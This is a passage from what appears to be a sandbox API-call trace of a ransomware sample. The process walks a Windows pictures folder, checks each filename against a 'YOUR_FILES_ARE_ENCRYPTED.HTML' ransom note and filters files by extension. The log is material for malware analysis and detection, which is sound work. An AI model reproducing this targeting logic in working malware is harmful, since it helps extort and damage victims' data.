ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile11.bmp", cAlternateFileName="")) returned 1 [0157.230] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp") returned 82 [0157.231] lstrcmpW (lpString1="usertile11.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.231] PathFindExtensionW (pszPath="usertile11.bmp") returned=".bmp" [0157.231] lstrlenW (lpString=".bmp") returned 4 [0157.231] PathFindExtensionW (pszPath="usertile11.bmp") returned=".bmp" [0157.231] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52733076, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52733076, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf1c4587c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile12.bmp", cAlternateFileName="")) returned 1 [0157.231] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp") returned 82 [0157.231] lstrcmpW (lpString1="usertile12.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.231] PathFindExtensionW (pszPath="usertile12.bmp") returned=".bmp" [0157.231] lstrlenW (lpString=".bmp") returned 4 [0157.231] PathFindExtensionW (pszPath="usertile12.bmp") returned=".bmp" [0157.231] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x527591de, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x527591de, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf1c4587c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xbeb8, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile13.bmp", cAlternateFileName="")) returned 1 [0157.231] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp") returned 82 [0157.231] lstrcmpW (lpString1="usertile13.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.231] PathFindExtensionW (pszPath="usertile13.bmp") returned=".bmp" [0157.231] lstrlenW (lpString=".bmp") returned 4 [0157.231] PathFindExtensionW (pszPath="usertile13.bmp") returned=".bmp" [0157.231] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x527591de, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x527591de, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf1e5abbc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile14.bmp", cAlternateFileName="")) returned 1 [0157.231] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp") returned 82 [0157.231] lstrcmpW (lpString1="usertile14.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.231] PathFindExtensionW (pszPath="usertile14.bmp") returned=".bmp" [0157.231] lstrlenW (lpString=".bmp") returned 4 [0157.231] PathFindExtensionW (pszPath="usertile14.bmp") returned=".bmp" [0157.231] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5277f346, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x5277f346, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf1e80d1c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile15.bmp", cAlternateFileName="")) returned 1 [0157.231] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp") returned 82 [0157.232] lstrcmpW (lpString1="usertile15.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.232] PathFindExtensionW (pszPath="usertile15.bmp") returned=".bmp" [0157.232] lstrlenW (lpString=".bmp") returned 4 [0157.232] PathFindExtensionW (pszPath="usertile15.bmp") returned=".bmp" [0157.232] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x527a54ae, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x527a54ae, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf1ea6e7c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile16.bmp", cAlternateFileName="")) returned 1 [0157.232] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp") returned 82 [0157.232] lstrcmpW (lpString1="usertile16.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.232] PathFindExtensionW (pszPath="usertile16.bmp") returned=".bmp" [0157.232] lstrlenW (lpString=".bmp") returned 4 [0157.232] PathFindExtensionW (pszPath="usertile16.bmp") returned=".bmp" [0157.232] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x527cb616, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x527cb616, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf1ea6e7c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile17.bmp", cAlternateFileName="")) returned 1 [0157.232] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp") returned 82 [0157.232] lstrcmpW (lpString1="usertile17.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.232] PathFindExtensionW (pszPath="usertile17.bmp") returned=".bmp" [0157.232] lstrlenW (lpString=".bmp") returned 4 [0157.232] PathFindExtensionW (pszPath="usertile17.bmp") returned=".bmp" [0157.232] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x527cb616, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x527cb616, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf1eccfdc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile18.bmp", cAlternateFileName="")) returned 1 [0157.232] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp") returned 82 [0157.232] lstrcmpW (lpString1="usertile18.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.232] PathFindExtensionW (pszPath="usertile18.bmp") returned=".bmp" [0157.232] lstrlenW (lpString=".bmp") returned 4 [0157.232] PathFindExtensionW (pszPath="usertile18.bmp") returned=".bmp" [0157.232] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x527f177e, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x527f177e, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf1ef313c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile19.bmp", cAlternateFileName="")) returned 1 [0157.233] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp") returned 82 [0157.233] lstrcmpW (lpString1="usertile19.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.233] PathFindExtensionW (pszPath="usertile19.bmp") returned=".bmp" [0157.233] lstrlenW (lpString=".bmp") returned 4 [0157.233] PathFindExtensionW (pszPath="usertile19.bmp") returned=".bmp" [0157.233] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x527f177e, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x527f177e, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf1f1929c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile20.bmp", cAlternateFileName="")) returned 1 [0157.233] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp") returned 82 [0157.233] lstrcmpW (lpString1="usertile20.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.233] PathFindExtensionW (pszPath="usertile20.bmp") returned=".bmp" [0157.233] lstrlenW (lpString=".bmp") returned 4 [0157.233] PathFindExtensionW (pszPath="usertile20.bmp") returned=".bmp" [0157.233] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x528178e6, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x528178e6, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf1f1929c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile21.bmp", cAlternateFileName="")) returned 1 [0157.233] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp") returned 82 [0157.233] lstrcmpW (lpString1="usertile21.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.233] PathFindExtensionW (pszPath="usertile21.bmp") returned=".bmp" [0157.233] lstrlenW (lpString=".bmp") returned 4 [0157.233] PathFindExtensionW (pszPath="usertile21.bmp") returned=".bmp" [0157.233] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5283da4e, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x5283da4e, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf1f3f3fc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile22.bmp", cAlternateFileName="")) returned 1 [0157.233] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp") returned 82 [0157.233] lstrcmpW (lpString1="usertile22.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.233] PathFindExtensionW (pszPath="usertile22.bmp") returned=".bmp" [0157.233] lstrlenW (lpString=".bmp") returned 4 [0157.233] PathFindExtensionW (pszPath="usertile22.bmp") returned=".bmp" [0157.234] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52863bb6, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52863bb6, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf1f6555c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile23.bmp", cAlternateFileName="")) returned 1 [0157.234] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp") returned 82 [0157.234] lstrcmpW (lpString1="usertile23.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.234] PathFindExtensionW (pszPath="usertile23.bmp") returned=".bmp" [0157.234] lstrlenW (lpString=".bmp") returned 4 [0157.234] PathFindExtensionW (pszPath="usertile23.bmp") returned=".bmp" [0157.234] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x528afe86, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x528afe86, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf2238f7c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile24.bmp", cAlternateFileName="")) returned 1 [0157.234] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp") returned 82 [0157.234] lstrcmpW (lpString1="usertile24.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.234] PathFindExtensionW (pszPath="usertile24.bmp") returned=".bmp" [0157.234] lstrlenW (lpString=".bmp") returned 4 [0157.234] PathFindExtensionW (pszPath="usertile24.bmp") returned=".bmp" [0157.234] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x528d5fee, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x528d5fee, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf225f0dc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile25.bmp", cAlternateFileName="")) returned 1 [0157.234] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp") returned 82 [0157.234] lstrcmpW (lpString1="usertile25.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.234] PathFindExtensionW (pszPath="usertile25.bmp") returned=".bmp" [0157.234] lstrlenW (lpString=".bmp") returned 4 [0157.234] PathFindExtensionW (pszPath="usertile25.bmp") returned=".bmp" [0157.234] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x528d5fee, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x528d5fee, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf228523c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile26.bmp", cAlternateFileName="")) returned 1 [0157.234] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp") returned 82 [0157.234] lstrcmpW (lpString1="usertile26.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.234] PathFindExtensionW (pszPath="usertile26.bmp") returned=".bmp" [0157.234] lstrlenW (lpString=".bmp") returned 4 [0157.235] PathFindExtensionW (pszPath="usertile26.bmp") returned=".bmp" [0157.235] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x529222be, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x529222be, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf22ab39c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile27.bmp", cAlternateFileName="")) returned 1 [0157.235] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp") returned 82 [0157.235] lstrcmpW (lpString1="usertile27.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.235] PathFindExtensionW (pszPath="usertile27.bmp") returned=".bmp" [0157.235] lstrlenW (lpString=".bmp") returned 4 [0157.235] PathFindExtensionW (pszPath="usertile27.bmp") returned=".bmp" [0157.235] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52948426, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52948426, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf22ab39c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile28.bmp", cAlternateFileName="")) returned 1 [0157.235] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp") returned 82 [0157.235] lstrcmpW (lpString1="usertile28.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.235] PathFindExtensionW (pszPath="usertile28.bmp") returned=".bmp" [0157.235] lstrlenW (lpString=".bmp") returned 4 [0157.235] PathFindExtensionW (pszPath="usertile28.bmp") returned=".bmp" [0157.235] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5296e58e, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x5296e58e, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf22d14fc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile29.bmp", cAlternateFileName="")) returned 1 [0157.235] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp") returned 82 [0157.235] lstrcmpW (lpString1="usertile29.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.235] PathFindExtensionW (pszPath="usertile29.bmp") returned=".bmp" [0157.235] lstrlenW (lpString=".bmp") returned 4 [0157.235] PathFindExtensionW (pszPath="usertile29.bmp") returned=".bmp" [0157.235] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x529946f6, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x529946f6, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf234391c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile30.bmp", cAlternateFileName="")) returned 1 [0157.235] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp") returned 82 [0157.235] lstrcmpW (lpString1="usertile30.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.235] PathFindExtensionW (pszPath="usertile30.bmp") returned=".bmp" [0157.236] lstrlenW (lpString=".bmp") returned 4 [0157.236] PathFindExtensionW (pszPath="usertile30.bmp") returned=".bmp" [0157.236] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x529ba85e, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x529ba85e, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf234391c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile31.bmp", cAlternateFileName="")) returned 1 [0157.236] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp") returned 82 [0157.236] lstrcmpW (lpString1="usertile31.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.236] PathFindExtensionW (pszPath="usertile31.bmp") returned=".bmp" [0157.236] lstrlenW (lpString=".bmp") returned 4 [0157.236] PathFindExtensionW (pszPath="usertile31.bmp") returned=".bmp" [0157.236] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52a06b2e, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52a06b2e, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf238fbdc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile32.bmp", cAlternateFileName="")) returned 1 [0157.236] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp") returned 82 [0157.236] lstrcmpW (lpString1="usertile32.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.236] PathFindExtensionW (pszPath="usertile32.bmp") returned=".bmp" [0157.236] lstrlenW (lpString=".bmp") returned 4 [0157.236] PathFindExtensionW (pszPath="usertile32.bmp") returned=".bmp" [0157.236] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52a52dfe, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52a52dfe, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf238fbdc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile33.bmp", cAlternateFileName="")) returned 1 [0157.236] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp") returned 82 [0157.236] lstrcmpW (lpString1="usertile33.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.236] PathFindExtensionW (pszPath="usertile33.bmp") returned=".bmp" [0157.236] lstrlenW (lpString=".bmp") returned 4 [0157.236] PathFindExtensionW (pszPath="usertile33.bmp") returned=".bmp" [0157.236] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52a78f66, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52a78f66, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf23b5d3c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile34.bmp", cAlternateFileName="")) returned 1 [0157.236] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp") returned 82 [0157.236] lstrcmpW (lpString1="usertile34.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.236] PathFindExtensionW (pszPath="usertile34.bmp") returned=".bmp" [0157.237] lstrlenW (lpString=".bmp") returned 4 [0157.237] PathFindExtensionW (pszPath="usertile34.bmp") returned=".bmp" [0157.237] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52a9f0ce, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52a9f0ce, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf23dbe9c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile35.bmp", cAlternateFileName="")) returned 1 [0157.237] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp") returned 82 [0157.237] lstrcmpW (lpString1="usertile35.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.237] PathFindExtensionW (pszPath="usertile35.bmp") returned=".bmp" [0157.237] lstrlenW (lpString=".bmp") returned 4 [0157.237] PathFindExtensionW (pszPath="usertile35.bmp") returned=".bmp" [0157.237] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52aeb39e, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52aeb39e, 